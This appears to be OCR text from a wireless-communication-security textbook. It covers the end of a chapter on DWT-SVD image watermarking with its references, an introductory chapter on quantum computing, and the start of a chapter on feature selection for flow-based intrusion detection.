mark insertion procedure which provide high resistance 
towards the image processing attacks. 
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2. The presence of energy preservation property makes the 
low-frequency coefficients more tolerant against any image 
distortion. 

3. The inclusion of a security key enhances the security of the 
watermark against unauthorized detection. 


The PSNR and NC plots are demonstrated in Figures 3.9 and 3.10, 
respectively. 
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Figure 3.9 PSNR values for the results obtained by the method proposed in [7, 10] and 
our proposed method. 
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Figure 3.10 PSNR values for the results obtained by the method proposed in [7, 10] and 
our proposed method. 
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3.6 Conclusion 


In this chapter, a novel grayscale image watermarking method in the hybrid 
domain using DWT and SVD hybridization is presented. This proposed 
method is highly secure against the unauthorized watermark extraction 
attempted by any Active attacker. Using the Haar wavelet decomposition in 
DWT we have extracted the low-frequency coefficients for the watermark 
embedding process. The watermark insertion over the low-frequency coef- 
ficients makes this proposed method robust against most of the image pro- 
cessing attacks. The watermark is inserted over the S coefficients extracted 
from these low-frequency coefficients, which makes this method more 
robust. The locations for the watermark insertion from these S coefficients 
are selected based upon the security key. Experimental analysis of the pro- 
posed methods and comparison with two state-of-the-art methods show- 
cased that the proposed scheme offers better imperceptibility and robustness 
against the image processing attacks such as blurring, cropping, the addition 
of Gaussian noise, resize, salt & pepper noise, rotation, and sharpening. 

The proposed method in this work is semi-blind because, during the 
watermark extraction process, we require the original watermark image. 
As the proposed method offers high performance in terms of robust- 
ness and imperceptibility along with enhancement in the security of the 
watermark, this method can be used for digital watermarking applications 
where copyright protection, copy protection, and ownership assertion are 
foremost required. 


References 


1. Cox, I. J., Kilian, J., Leighton, FE T., & Shamoon, T. (1997). Secure spread 
spectrum watermarking for multimedia. IEEE Transactions on Image 
Processing, 6(12), 1673-1687. 

2. Kutter, M., & Petitcolas, FE A. (1999, April). Fair benchmark for image water- 
marking systems. In Security and Watermarking of Multimedia Contents (Vol. 
3657, pp. 226-239). International Society for Optics and Photonics. 

3. Cox, I. J., & Miller, M. L. (2002). The first 50 years of electronic watermark- 
ing. EURASIP Journal on Advances in Signal Processing, 2002(2), 1-7. 

4. Cox, I. J., Miller, M. L., Bloom, J. A., & Honsinger, C. (2002). Digital 
Watermarking (Vol. 53). San Francisco: Morgan Kaufmann. 

5. Mishra, S., Mahapatra, A., & Mishra, P. (2013). A survey on digital watermark- 
ing techniques. International Journal of Computer Science and Information 
Technologies, 4(3), 451-456. 


10. 


11. 


12. 


13. 


14. 


15. 


16. 


17. 


18. 


19. 


ENHANCED IMAGE SECURITY THROUGH HYBRID APPROACH 53 


. Kadian, P., Arora, S. M., & Arora, N. (2021). Robust Digital Watermarking 


Techniques for Copyright Protection of Digital Data: A Survey. Wireless 
Personal Communications, 1-25. 


. Kadian, P., Arora, N., & Arora, S. M. (2019, March). Performance Evaluation 


of Robust Watermarking Using DWT-SVD and RDWT-SVD. In 2019 6th 
International Conference on Signal Processing and Integrated Networks 
(SPIN) (pp. 987-991). IEEE. 


. Kadian, P., Arora, N., & Arora, S. M. (2019). A Highly Secure and Robust 


Copyright Protection Method for Grayscale Images using DWT-SVD. 
In International Journal of Recent Technology and Engineering, 8(3), 
7284-7288. 


. Kadian, P, Arora, N., & Arora, S. M. (2019). Role of scaling factor in 


Digital watermarking. In International Journal of Innovative Technology and 
Exploring Engineering, 8 (11), 1658-1669. 

Poonam, Arora, S. M. (2018). A DWT-SVD based robust digital watermark- 
ing for digital images. In Procedia Computer Science, 132, 1441-1448. 
Kadian, P., Arora, V., & Arora, S. M. (2020, July). Robust Watermarking 
Schemes for Copyright Protection of Digital Data: A Survey. In 2nd 
International Conference on Emerging Technologies in Data Mining and 
Information Security (IEMIS 2020). Springer. 

Roy, S., & Pal, A. K. (2018). An SVD based location specific robust color 
image watermarking scheme using RDWT and Arnold scrambling. Wireless 
Personal Communications, 98(2), 2223-2250. 

alias Sathya, S. P., & Ramakrishnan, S. (2018). Fibonacci based key frame selec- 
tion and scrambling for video watermarking in DWT-SVD domain. Wireless 
Personal Communications, 102(2), 2011-2031. 

Jiansheng, M., Sukang, L., & Xiaomei, T. (2009). A digital watermarking 
algorithm based on DCT and DWT. In Proceedings. The 2009 International 
Symposium on Web Information Systems and Applications (WISA 2009) 
(p. 104). Academy publisher. 

Mishra, A., Jain, A., Narwaria, M., & Agarwal, C. (2011). An experimental 
study into objective quality assessment of watermarked images. International 
Journal of Image Processing, 5(2), 199-219. 

Hsu, C. T., & Wu, J. L. (1999). Hidden digital watermarks in images. IEEE 
Transactions on Image Processing, 8(1), 58-68. 

Singh, D., Choudhary, N., & Agrawal, M. (2012). Spatial and Frequency 
Domain for Grey level Digital Images. Special Issue of International Journal of 
Computer Applications (0975-8887) on Communication Security (4), 16-20. 
Chu, W. C. (2003). DCT-based image watermarking using subsampling. IEEE 
Transactions on Multimedia, 5(1), 34-38. 

Yavuz, E., & Telatar, Z. (2006, September). SVD adapted DCT domain DC 
subband image watermarking against watermark ambiguity. In International 
Workshop on Multimedia Content Representation, Classification and 
Security (pp. 66-73). Springer, Berlin, Heidelberg. 


54 


20. 


21. 


22. 


23. 


24, 


25. 


26. 


27. 


28. 


29. 


30. 


31. 


32. 


33. 


WIRELESS COMMUNICATION SECURITY 


Eyadat, M., & Vasikarla, S. (2005). Performance evaluation of an incorpo- 
rated DCT block-based watermarking algorithm with human visual system 
model. Pattern Recognition Letters, 26(10), 1405-1411. 

Rioul, O., & Duhamel, P. (1992). Fast algorithms for discrete and contin- 
uous wavelet transforms. IEEE Transactions on Information Theory, 38(2), 
569-586. 

Wang, X. Y., Yang, H. Y., & Fu, Z. K. (2010). A new wavelet-based image 
denoising using undecimated discrete wavelet transform and least 
squares support vector machine. Expert Systems with Applications, 37(10), 
7040-7049. 

Daubechies, I., & Sweldens, W. (1998). Factoring wavelet transforms into lift- 
ing steps. Journal of Fourier Analysis and Applications, 4(3), 247-269. 
Verma, V. S., & Jha, R. K. (2015). Improved watermarking technique based 
on significant difference of lifting wavelet coefficients. Signal, Image and 
Video Processing, 9(6), 1443-1450. 

Hsu, C. T., & Wu, J. L. (1998). Multiresolution watermarking for digital 
images. IEEE Transactions on Circuits and Systems II: Analog and Digital 
Signal Processing, 45(8), 1097-1101. 

Lie, W. N., Lin, G. S., Wu, C. L., & Wang, T. C. (2000, May). Robust image 
watermarking on the DCT domain. In 2000 IEEE International Symposium 
on Circuits and Systems (ISCAS) (Vol. 1, pp. 228-231). IEEE. 

Hernandez, J. R., Amado, M., & Perez-Gonzalez, F. (2000). DCT-domain 
watermarking techniques for still images: Detector performance analysis and 
a new structure. IEEE Transactions on Image Processing, 9(1), 55-68. 

Barni, M., Bartolini, F., & Piva, A. (2001). Improved wavelet-based water- 
marking through pixel-wise masking. IEEE Transactions on Image 
Processing, 10(5), 783-791. 

Liyun, S., Hong, M. A., & Shifu, T. (2006). Adaptive image digital watermark- 
ing with DCT and FCM. Wuhan University Journal of Natural Sciences, 11(6), 
1657-1660. 

Verma, V. S., & Jha, R. K. (2015). Improved watermarking technique based 
on significant difference of lifting wavelet coefficients. Signal, Image and 
Video Processing, 9(6), 1443-1450. 

Li, E., Liang, H., & Niu, X. (2006, June). Blind image watermarking scheme 
based on wavelet tree quantization robust to geometric attacks. In 2006 6th 
World Congress on Intelligent Control and Automation (Vol. 2, pp. 10256- 
10260). IEEE. 

Lin, W. H., Horng, S. J., Kao, T. W., Fan, P., Lee, C. L., & Pan, Y. (2008). 
An efficient watermarking method based on significant difference of wavelet 
coefficient quantization. IEEE Transactions on Multimedia, 10(5), 746-757. 
Byun, K., Lee, S., & Kim, H. (2005, December). A watermarking method 
using quantization and statistical characteristics of wavelet transform. 
In Sixth International Conference on Parallel and Distributed Computing 
Applications and Technologies (PDCAT’05) (pp. 689-693). IEEE. 


34. 


39. 


36. 


37. 


38. 


39. 


40. 


41. 


42. 


43. 


44, 


45. 


46. 


47. 


ENHANCED IMAGE SECURITY THROUGH HYBRID APPROACH 55 


Phadikar, A., Maity, S. P., & Kundu, M. K. (2008, December). Quantization 
based data hiding scheme for efficient quality access control of images 
using DWT via lifting. In 2008 Sixth Indian Conference on Computer Vision, 
Graphics & Image Processing (pp. 265-272). IEEE. 

Santhi, V., & Arulmozhivarman, P. (2013). Hadamard transform based adap- 
tive visible/invisible watermarking scheme for digital images. Journal of 
Information Security and Applications, 18(4), 167-179. 

Singh, A. K., Dave, M., & Mohan, A. (2014). Hybrid technique for robust and 
imperceptible dual watermarking using error correcting codes for applica- 
tion in telemedicine. International Journal of Electronic Security and Digital 
Forensics, 6(4), 285-305. 

Ahmad, A., Sinha, G. R., & Kashyap, N. (2014). 3-Level DWT Image 
Watermarking Against Frequency and Geometrical Attacks. International 
Journal of Computer Network & Information Security, 6(12). 

Rahman, M. A., & Rabbi, M. F. (2015). DWT-SVD based new watermarking 
idea in RGB color space. International Journal of Signal Processing, Image 
Processing and Pattern Recognition, 8(6), 193-198. 

Vaidya, S. P., & Mouli, P. C. (2015). Adaptive digital watermarking for copy- 
right protection of digital images in wavelet domain. Procedia Computer 
Science, 58, 233-240. 

Wu, H. T., & Huang, J. (2012). Reversible image watermarking on predic- 
tion errors by efficient histogram modification. Signal Processing, 92(12), 
3000-3009. 

Peng, F, Li, X., & Yang, B. (2012). Adaptive reversible data hiding scheme 
based on integer transform. Signal Processing, 92(1), 54-62. 

Jamal, S. S., Khan, M. U., & Shah, T. (2016). A watermarking tech- 
nique with chaotic fractional S-box transformation. Wireless Personal 
Communications, 90(4), 2033-2049. 

Anees, A. (2015). An image encryption scheme based on Lorenz system for 
low profile applications. 3D Research, 6(3), 1-10. 

Pan-Pan, N., Xiang-Yang, W., Yu-Nan, L., & Hong- Ying, Y. (2017). A robust 
color image watermarking using local invariant significant bitplane histo- 
gram. Multimedia Tools and Applications, 76(3), 3403-3433. 

Wang, X. Y., Niu, P. P., Yang, H. Y., & Chen, L. L. (2012). Affine invariant 
image watermarking using intensity probability density-based Harris Laplace 
detector. Journal of Visual Communication and Image Representation, 23(6), 
892-907. 

Gao, X., Deng, C., Li, X., & Tao, D. (2010). Geometric distortion insensi- 
tive image watermarking in affine covariant regions. IEEE Transactions on 
Systems, Man, and Cybernetics, Part C (Applications and Reviews), 40(3), 
278-286. 

Seo, J. S., & Yoo, C. D. (2006). Image watermarking based on invariant regions 
of scale-space representation. IEEE Transactions on Signal Processing, 54(4), 
1537-1549. 


56 


48. 


49. 


50. 


ol. 


52. 


53. 


54. 


D0: 


56. 


57. 


58. 


59. 


60. 


61. 


62. 


WIRELESS COMMUNICATION SECURITY 


Chen, C. H., Tang, Y. L., Wang, C. P., & Hsieh, W. S. (2014). A robust water- 
marking algorithm based on salient image features. Optik, 125(3), 1134-1140. 
Lei, B., Zhao, X., Lei, H., Ni, D., Chen, S., Zhou, E, & Wang, T. (2019). 
Multipurpose watermarking scheme via intelligent method and chaotic 
map. Multimedia Tools and Applications, 78(19), 27085-27107. 

Cao, X., Fu, Z., & Sun, X. (2016). A privacy-preserving outsourcing data stor- 
age scheme with fragile digital watermarking-based data auditing. Journal of 
Electrical and Computer Engineering, 2016. 

Singh, A. K. (2017). Improved hybrid algorithm for robust and impercep- 
tible multiple watermarking using digital images. Multimedia Tools and 
Applications, 76(6), 8881-8900. 

Rosiyadi, D., Horng, S. J., Fan, P., Wang, X., Khan, M. K., & Pan, Y. 
(2011). Copyright protection for e-government document images. [EEE 
MultiMedia, 19(3), 62-73. 

Singh, S., Rathore, V. S., Singh, R., & Singh, M. K. (2017). Hybrid semi-blind 
image watermarking in redundant wavelet domain. Multimedia Tools and 
Applications, 76(18), 19113-19137. 

Amini, M., Ahmad, M. O., & Swamy, M. N. S. (2017). Digital watermark 
extraction in wavelet domain using hidden Markov model. Multimedia Tools 
and Applications, 76(3), 3731-3749. 

Kalantari, N. K., & Ahadi, S. M. (2010). A logarithmic quantization index 
modulation for perceptually better data hiding. IEEE Transactions on Image 
Processing, 19(6), 1504-1517. 

Nezhadarya, E., Wang, Z. J., & Ward, R. K. (2011). Robust image watermark- 
ing based on multiscale gradient direction quantization. IEEE Transactions 
on Information Forensics and Security, 6(4), 1200-1213. 

Makbol, N. M., Khoo, B. E., & Rassem, T. H. (2018). Security analyses of 
false positive problem for the SVD-based hybrid digital image watermark- 
ing techniques in the wavelet transform domain. Multimedia Tools and 
Applications, 77(20), 26845-26879. 

Zhou, N. R., Hou, W. M. X., Wen, R. H., & Zou, W. P. (2018). Imperceptible 
digital watermarking scheme in multiple transform domains. Multimedia 
Tools and Applications, 77(23), 30251-30267. 

Ambadekar, S. P, Jain, J., & Khanapuri, J. (2019). Digital image watermark- 
ing through encryption and DWT for copyright protection. In Recent Trends 
in Signal and Image Processing (pp. 187-195). Springer, Singapore. 

Yu, P. T., Tsai, H. H., & Lin, J. S. (2001). Digital watermarking based on neu- 
ral networks for color images. Signal Processing, 81(3), 663-671. 

Zhenfei, W., Guangqun, Z., & Nengchao, W. (2006). Digital watermarking 
algorithm based on wavelet transform and neural network. Wuhan University 
Journal of Natural Sciences, 11(6), 1667-1670. 

Xu, X. Q., Wen, X. B., Li, Y. Q., & Quan, J. J. (2007, August). A new watermark- 
ing approach based on neural network in wavelet domain. In International 
Conference on Intelligent Computing (pp. 1-6). Springer, Berlin, Heidelberg. 


63. 


64. 


65. 


66. 


67. 


68. 


69. 


70. 


71. 


ENHANCED IMAGE SECURITY THROUGH HYBRID APPROACH 57 


Huang, S., Zhang, W., Feng, W., & Yang, H. (2008, June). Blind watermarking 
scheme based on neural network. In 2008 7th World Congress on Intelligent 
Control and Automation (pp. 5985-5989). IEEE. 

Ramamurthy, N., & Varadarajan, S. (2012). The robust digital image 
watermarking scheme with back propagation neural network in DWT 
domain. Procedia Engineering, 38, 3769-3778. 

Mun, S. M., Nam, S. H., Jang, H. U., Kim, D., & Lee, H. K. (2017). A robust 
blind watermarking using convolutional neural network. arXiv preprint 
arXiv:1704,03248. 

Liu, J. X., Wen, X. B., Yuan, L. M., & Xu, H. X. (2017). A robust approach 
of watermarking in contourlet domain based on probabilistic neural net- 
work. Multimedia Tools and Applications, 76(22), 24009-24026. 
Mohammed, G. N., Yasin, A., & Zeki, A. M. (2014, March). Robust image 
watermarking based on dual intermediate significant bit (DISB). In 2014 6th 
International Conference on Computer Science and Information Technology 
(CSIT) (pp. 18-22). IEEE. 

Cui, L., & Li, W. (2010). Adaptive multiwavelet-based watermarking through 
JPW masking. IEEE Transactions on Image Processing, 20(4), 1047-1060. 
http://hdl handle.net/10603/82341. 

K. Ramanjaneyulu, K. Rajarajeswari, “Wavelet-based oblivious image water- 
marking scheme using genetic algorithm’, IET Image Processing, Vol.6, Iss.4, 
pp. 364373, 2012. 

Lai, C. C., Ko, C. H., & Yeh, C. H. (2012, July). An adaptive SVD-based 
watermarking scheme based on genetic algorithm. In 2012 International 
Conference on Machine Learning and Cybernetics (Vol. 4, pp. 1546-1551). 
IEEE. 


4 


Quantum Computing 


Manisha Bharti* and Tanvika Garg 


National Institute of Technology, Delhi, India 


Abstract 

Quantum computers can bring about development in various fields like science 
and medicine that could save lives. Quantum computing can be instrumental 
in the advancement of machine learning so that illness can be diagnosed very 
quickly. With its help materials can be discovered so that efficient structures and 
devices can be made. It helps to bring about development in financial strategies 
so that one could lead a better life in retirement. There are various benefits of 
classical computing that one can experience in day-to-day life. But there are many 
challenges in today’s world which cannot be solved using classical computing. So 
quantum computing is developed that can be used to enhance the various algo- 
rithms in different fields. 


Keywords: Entanglement, superposition, qubits, optical quantum computing 


4.1 Introduction 


Quantum Computing is the modernization of computing. It is based on 
quantum mechanics and its phenomena. Quantum computing is the com- 
bination of physics, computer science, information theory and mathemat- 
ics. It provides lower energy consumption, higher computational power 
and better speed than the classical computers. These can be achieved by 
controlling how the small objects behave, i.e., microscopic particles like 
atoms, electrons, photons, etc. 
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4.2 A Brief History of Quantum Computing 


The idea of a quantum mechanics-based computational device was first 
thought about in the 1970s and early 1980s by scientists such as Paul A. 
Beniof of Arogonne National Laboratory in Illinois, David Deustch of the 
University of Oxford, Charles H. Bennet of the IBM Thomas J. Watson 
Research Centre and Richard P. Feynman of Caltech. When the scientists 
were thinking about the limitations of computation, they came up with this 
idea. In 1982, Feynman made an attempt to conceptualize the computer 
based on the quantum physics principles. He came up with a model that 
showcases how the computations could be performed using quantum sys- 
tem. He also explained the way a machine can simulate physical problems 
based on quantum physics. 

In other words, a physicist would be capable of performing experiments 
in quantum physics using a quantum mechanical computer. Feynman later 
made an analysis that quantum computers can solve such problems that a 
classical computer cannot solve. The reason behind this is that a classical 
computer needs exponentially growing time to solve such problems while 
a quantum computer takes polynomial time to perform such a calculation. 

In 1985, Deutsch proposed that the theory that Feynman asserted could 
be used to make a general-purpose quantum computer. He showed that 
any physical process can be modelled by a quantum computer. Thus, a 
quantum computer would be far more capable than a traditional classical 
computer. So, in order to find other interesting applications for quantum 
computers, efforts were made by scientists of those times. But not much 
success was achieved in this regard. In 1994, Peter Shor came up with an 
idea of using quantum computers to crack a problem in number theory, 
namely factorisation. This breakthrough transformed quantum computing 
from just an academic curiosity to something that was of great interest to 
many in the world. 

At present, there is a need of high security, bandwidth and computa- 
tional requirement. This could not be fulfilled by the classical approach. 
The classical approach does not provide a solution in computing that one 
can rely upon. The approach led to the development of physics (quantum) 
along with quantum computing. Efficient algorithms are required to be 
developed in the field of computing in order to use the quantum mechan- 
ics principles in this field. 

The quantum mechanics’ basic postulates that govern quantum com- 
puting, entanglement and polarization, and applications such as quantum 
cryptography, teleportation, etc., are described in the next section. 
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4.3 Postulate of Quantum Mechanics 


Quantum computing is ruled by four postulates. These postulates are the 
outcome of the observations which we get through experiments. These 
postulates are given as follows [2]: 


First Postulate 


“The actual state of any closed physical system can be described by 
means of a so-called state vector v having complex coefficients and unit 
length in a Hilbert space V, i.e., complex linear vector space (state space) 
equipped with an inner product.” [2] 


Second Postulate 


“The evolution of any closed physical system in time can be character- 
ized by means of unitary transforms depending only on the starting and 
finishing time of the evolution.” [2] 


Third Postulate 


“Any quantum measurement can be described by means of a set of mea- 
surement operators {Mm}, where m stands for the possible results of the 
measurement. The probability of measuring m if the system is in state v can 
be calculated as” [2] 


Fourth Postulate 


“The state space of a composite physical system W can be determined 
using the tensor product of the individual systems W = V @ Y. Furthermore, 
having defined v € V andy € Y then the joint state of the composite system 
isw=v@y' [2]. 


4.4 Polarization and Entanglement 


Polarization is achieved by orienting the oscillations that are perpendicu- 
lar to the plane in which a transverse wave is travelling. In context of the 
quantum computing, photons are a bunch of light particles. These particles 
obey all the above postulates and preserve the polarization property [3]. 
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The vertical and horizontal polarizations of light are explained by the fol- 
lowing figures. 

The vertical and horizontal polarizations are represented by p, and p,.The 
angular polarization is represented by p, [1]. In the classical approach, we 
can transmit any of the horizontal or vertical polarized light in order to 
send logic bit 1. We do not transmit anything for logic bit 0. We can also 
perform the encoding of the light that is vertically polarised to logic 1 and 
horizontally polarised to logic 0 and then transmit it. This method makes it 
easier to obtain the information from the bit received [1]. The light which 
is polarized, if transmitted in 45 degree one cannot tell of it being logic 1 
or 0 because it is at equal distance from the two axes. Therefore, half of it is 
decoded as logic 0 and other half of it as logic 1 by quantum measurement 
device. This is a random detection. The quantum mechanics’ indetermi- 
nacy is emphasized by it. This can be explained by taking the example of 
the tossing of a coin [1]. 

Let say there are three engineers, Bob, Alice and Eve. Alice wishes to 
send information to Bob, ie., ‘heads’ as ‘1’ and tails as ‘0. This transmission 
has no difficulty till Eve comes in between. Eve changes the state of the coin 
randomly which it takes from Alice. This leads to the confusion for Bob 
and error in the reception occurs. Bob and Alice learnt about quantum 
mechanics. They took the decision to use its properties in this situation. 
The rotation of the coin is performed by Alice. And then she sends it to 
Bob. In between, Eve takes the coin and flips it. But Bob knows that the 
direction of rotation represents the information and not heads or tails. So 
it is easy for him to decode clockwise as logic 1 and anticlockwise as logic 
0. In the quantum mechanics scenario, the coin is replaced by photon and 
the rotation by polarization [4]. 

Another spectacular physical phenomenon is Entanglement or quan- 
tum superposition, which is seen in the quantum computing world. The 
quantum states of these particles could not be independently described 
when they interact in such a way. The generation of particles could be done 
in such a way that they have entangled states. The particles are able to pre- 
serve their states (quantum) even though they are very far away from each 
other [3]. 

This scenario is again explained by the example of Alice, Bob, and the 
coin. This time Alice tosses two coins in place of one coin. She asks Bob 
to catch both of them. Four possible outcomes can be obtained by Bob. In 
order to ensure that both the coins rotate in the same manner simultane- 
ously, Alice sticks a rod to them. Bob receives only two states which could 
either tails or heads. The scenario can be elaborated. Suppose Bob and 
Alice are three miles away from each other. The rod’s length is increased to 
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three miles. Alice asks Bob to collect the coin from three miles away after 
she has tossed it. Bob receives the same information as both the coins are 
in the same state. This could be related to the quantum communication 
world. The photonic entanglement can be represented as the two coins, the 
transmitter is Alice, the receiver is Bob and the distance is the channel [7]. 

The entanglement and polarization phenomena are very interesting and 
useful. They can be extended into applications that are security based like 
quantum key distribution, quantum cryptography, etc. [4]. 


4.5 Applications and Advancements 


4.5.1 Cryptography, Teleportation and Communication 
Networks 


In this application, the transfer of particle’s quantum state takes place 
over a distance. This phenomenon is based on the quantum entanglement 
that has been mentioned before. The information moves from one point 
to another in the phenomenon of teleportation. Cryptography and com- 
puting is one of the major applications of entanglement [1]. Mathematical 
problems and algorithms are the basis of conventional cryptography. So if 
the algorithm is cracked efficiently, the security of the information is lost. 
Here, entanglement comes into the picture. The attempt of eavesdropping 
alters the situation and can also be analysed. This makes the communi- 
cation reliable without using complicated procedures and algorithms [9]. 
This helps for the establishment of secure quantum communication [5]. 


4.5.2 Quantum Computing and Memories 


This is the field in which entanglement and superposition is directly used 
to perform operations on data. This idea was first introduced by Richard 
Feynman and Yuri Maninwere [3]. Quantum computers will be more effi- 
cient than classical ones, with fewer problems. Along with integer factor- 
ization, many other algorithms and problems are analysed by making use 
of quantum computing techniques [8, 11]. 

A huge amount of inventions have occurred in this domain. Researchers 
have invented different quantum computer models. Some of them are one- 
way quantum computer, quantum gate array, topological quantum com- 
puter, and adiabatic quantum computer. It has been found by researchers 
that quantum computers based on the architecture of Von-Neumann are 
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Figure 4.1 Quantum satellite transmission [Bacsardi et al., [4]. 


possible. Also, Quantum computing breakthrough with integrated circuits 
(superconducting) is also possible [9]. 


4.5.3 Satellite Communication Based on Quantum Computing 


A quantum channel is a channel that carries out the transmission related 
to classical and quantum information. Figure 4.3 depicts classical informa- 
tion’s transmission done by the sender to the receiver through quantum 
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Figure 4.2 Configurations of satellite communication [Marshall et al., [6]. 
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Figure 4.3 Vertical and horizontal polarization [1, 9]. 


channel (satellite). The starting of communication is done in classical 
domain which is later converted to quantum domain. This can be seen as 
an analogy to the channel coding and source coding in the domain related 
to classical computing. The channel is used to send data. The damaged 
bits are received by Bob. The quantum transformations (block D) are per- 
formed by him. Finally, the data is measured by him [10]. 


4.5.4 Machine Learning & Artificial Intelligence 


Artificial intelligence and machine learning are the booming areas in the 
2020s. These emerging technologies have affected the lives of humans. Some 
widespread applications in everyday life are in voice, handwriting and image 
recognition. It has become challenging for traditional computers to provide 
that level of accuracy and speed, which has led to the development of quan- 
tum computers that provide processing of complex problems in fractions of 
a second. This would have taken traditional computers thousands of years. 


4.6 Optical Quantum Computing 


Light’s basic unit is the photon. A photon is encoded by using polarization. 
Optical quantum computing basically uses polarization. The electromag- 
netic theory defines light’s physical nature. The direction of light’s electric 
part is defined by the direction of polarization. If the vertical and horizon- 
tal directions are defined as 1 and 0 by using the concept of polarization 
encoding, then other polarizations, e.g., elliptical polarization, 1/4-polar- 
ization and circular polarization are the superposition of 1 and 0. 
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Figure 4.4 Representation of vector of different polarizations (photon) [1] Sandorlme et al., [9]. 


A photon passes through the component and makes a measurement on 
its polarization state [13, 14]. 


4.7 Experimental Realisation of Quantum Computer 


The simple architecture helps in making the quantum computer smaller, 
faster and cheaper. ‘The intricacies (conceptual) are causing difficulty in its 
experimental realization. Many attempts have been made in this field with 
fruitful outputs. However, the time is not far away when the digital com- 
puter will be fully replaced by the quantum computer. Some of the many 
attempts that have been made are summarized below. 


4.7.1 Hetero-Polymers 


The first quantum computer based on hetero-polymer was built in 1988 by 
Teich and was later improved by Lloyd in 1993. The array of atoms formed 
in linear fashion is utilised as cells (memory) in a hetero-polymer com- 
puter. The storage of information is done on a cell when the pumping of 
the corresponding atom is performed into an excited state. Instructions are 
given to the hetero-polymer by making use of laser pulses. The duration 
and the shape of the pulse decides the computation’s nature that is per- 
formed on chosen atoms. 
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4.7.2 Ion Traps 


A quantum computer based on an ion trap was first proposed by Cirac 
and Zoller in 1995 and it was worked on first by Monroe and collaborators 
in 1995 and then by Schwarzchild in 1996. This computer performs the 
encoding of data in ions’ energy states and in modes of vibration between 
the ions. Conceptually, a separate laser operates each ion. It was demon- 
strated that the ion trap computer can be helpful in evaluating Fourier 
transforms which leads to Shor’s factoring algorithm (based on Fourier 
transforms). 


4.7.3 Quantum Electrodynamics Cavity 


A quantum electrodynamics (QED) cavity computer was invented by 
Turchette and collaborators in 1995. This computer has a cesium atoms 
filled in QED cavity. It also consists of an arrangement of lasers, polarizer, 
phase shift detectors and mirrors. 


4.7.4 Quantum Dots 


Quantum dot technology-based quantum computers use simple architec- 
ture. They also use less sophisticated theoretical, experimental, and math- 
ematical skills. The fabrication of quantum gates is done using quantum 
dots array in which the connection of dots is carried out by using the split 
gate technique. This technique has an advantage; the controlling of quibits 
is done electrically. 


4.8 Challenges of Quantum Computing 


Quantum computing, if built in large scale, is a novel technology that can 
carry out computation powerfully. However the processes such as fab- 
rication, verification and architecture are some of the challenges that it 
presents. As it has to store a complex information in one bit, the building, 
verification and designing of quantum computers become very difficult. 
They are fragile and should be operated at low temperatures. It very often 
gives more errors than classical computers, so error correction is one of the 
dominant tasks that are needed to be performed in the building of quan- 
tum computers. 
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4.9 Conclusion and Future Scope 


Many universities, research groups, and colleges are working on this topic, 
hence the quantum computing field is developing rapidly. More and more 
research is being done and is used in various applications. The challenge 
in this field is to move from carrying out experiments to controlling the 
phenomenon of quantum computing. The conventional computer's per- 
formance can be exceeded by the system which obeys quantum mechani- 
cal laws. It might take years to build the quantum computers commercially 
but it would definitely bring about a revolution. 
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Abstract 

During the last decennium, computer network security has undergone an incred- 
ible revolution with the rapid development of high-speed networking tech- 
nologies. A good example is NetFlow, which has experienced a drastic advance 
since the arrival of flow-enabled networking devices. According to a study, 70% 
of the network operators have devices with flow-exporting capabilities. Netflow 
export technology aggregates network packets into the flow. This NetFlow format 
advancement in the number of IP packet features has a huge advantage. In other 
words, if the latest version of NetFlow is enabled on your network device, a lot of 
network information becomes available to you; for example, Netflow v9 traffic has 
280 features. Serving many network issues, these entire features may be necessary. 
However, in the case of network Intrusion Detection System (IDS) not all these 
features may be needed. Some may be redundant and not relevant. Such features 
can affect the performance of the IDS. Simultaneously, the time required for iden- 
tifying the attack and resource consumption for IDS is increasing. An ID detects 
malicious traffic based on the extracted features from network flow. This article 
reviews the use of feature selection for the flow-based network IDS. 
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5.1 Introduction 


The ever-evolving research in the computer networking field made it pos- 
sible to get Internet (that is, nothing but computer network) access every- 
where. Also, there is tremendous growth in network speed compared to 
ten years ago (which was in just KBs). Along with the increase in speed, 
the number of internet (computer network) users is also increasing. This 
rapid proliferation in technology has caused ever-increasing network traf- 
fic, which is burdening the network security analysis tools. The network 
security tools also need to cope with the increasing network speed and the 
increasing number of users or network traffic. Unfortunately, these tools are 
not coping. An Intrusion Detection System (IDS) is such a network anal- 
ysis tool that can classify network traffic into normal and malicious traffic. 
However, the old packet-based approach used in such IDS looks insuffi- 
cient with increased speed and traffic. This issue has motivated research- 
ers to come up with a flow-based IDS approach. Some research uses a 
feature selection approach before classifying the traffic using a machine 
learning-based classifier. The application of feature selection before clas- 
sifiers improves its performance and saves resources in memory and time. 

The need for feature selections in the Flow- Based IDS approach is moti- 
vated by the following: 


i. Today, all high devices are equipped with a flow capturing 
facility, making readily available flow records, making the 
approach cost-effective. 

ii. The IPFIX protocol standard defines how IP Flow informa- 
tion can be exported to the devices. 

iii. Suiting today’s high speed and increased volume of network 
data. 

iv. It can deal with newer protocols due to the absence of 
payload. 

v. Increasing the number of IP flow features with each flow- 
based (Netflow) version. 

vi. Irrelevant and redundant features present in flow-based 
data 

vii. Less storage is required for flow-based data. 


The chapter’s objective is to present current futuristic feature selection 
methods in flow-based IDS. 
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5.1.1 Intrusion Detection System 


There exist multiple ways for IDS classifications. In the literature 
detection-based model, audit source locations based or sort of study based 
are common, as depicted in Figure 5.1. In this chapter, IDS is classified as 
signature-based versus anomaly-based and host-based versus network-based. 


5.1.2 IDS Classification 


An IDS may be classified in various ways that supported various param- 
eters like sorts of processing (detection model), the sort of study, or the 
supply of the information (audit source locations), as shown in Figure 5.1. 
However, we will classify IDS into two widely best-known classifications, 
signature versus anomaly-based and host versus network-based. 
Signature-based intrusion detection is used to detect known attacks 
whose pattern or certain rules are stored in some database. Incoming 
information (data packets) are analyzed, and if their pattern is matched 
with stored in database then such packets are termed as malicious, and 
the system is alerted about such attacks. But this approach fails to detect 
attacks whose signatures are not stored in the database. This problem is 
solved with the anomaly detection approach. Here a normal profile of 
the system is created by training the IDS time to time. This is a dynamic 
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Figure 5.1 Intrusion detection system classification [1]. 
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approach for partially known and unseen attacks. When the IDS encoun- 
ters any deviations in the normal profile, it alerts system administration 
about the events. But this suffers from a number of false positives [2]. 

The Host-based IDS needs to be installed on every system on the net- 
work, similar to antivirus software. Thus it can protect only that installed 
system, not the complete network. There is a need to install network-based 
IDS (NIDS) on the network to protect the complete network. It is situated 
in the network so that all network traffic has to pass through this NIDS. 
This NIDS can be based on the packet-based approach or the flow-based 
approach. In the packet-based approach, each packet flowing the network 
will be analyzed at NIDS. However, the increase in network traffic with 
high network speed can result in dropping packets at NIDS, and this can 
affect the performance of NIDS. A flow-based approach gives the solu- 
tion to this problem. In this approach, packets with similar information 
